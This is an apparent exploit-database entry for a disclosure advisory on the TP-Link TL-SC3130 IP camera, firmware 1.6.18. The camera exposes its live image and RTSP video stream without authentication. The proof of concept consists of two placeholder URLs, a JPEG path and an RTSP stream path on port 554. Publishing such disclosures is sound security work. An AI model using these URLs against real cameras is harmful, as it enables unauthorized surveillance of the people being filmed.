TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure Vulnerability

2018-10-18
ID: 99790
CVE: None
Download vulnerable application: None
# Exploit Title: TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Vendor: TP-LINK Technologies Co., Ltd.
# Product web page: http://www.tp-link.com
# Affected version: 1.6.18P12_121101
# Tested on: Boa/0.94.14rc21
# CVE: N/A
# References:
# Advisory ID: ZSL-2018-5497
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5497.php
  Desc: The TP-Link TL-SC3130 suffers from an unauthenticated and unauthorized
live RTSP stream disclosure.
  # PoC:
  http://TARGET/jpg/image.jpg
rtsp://TARGET:554/video.3gp
1-4-2 (www01)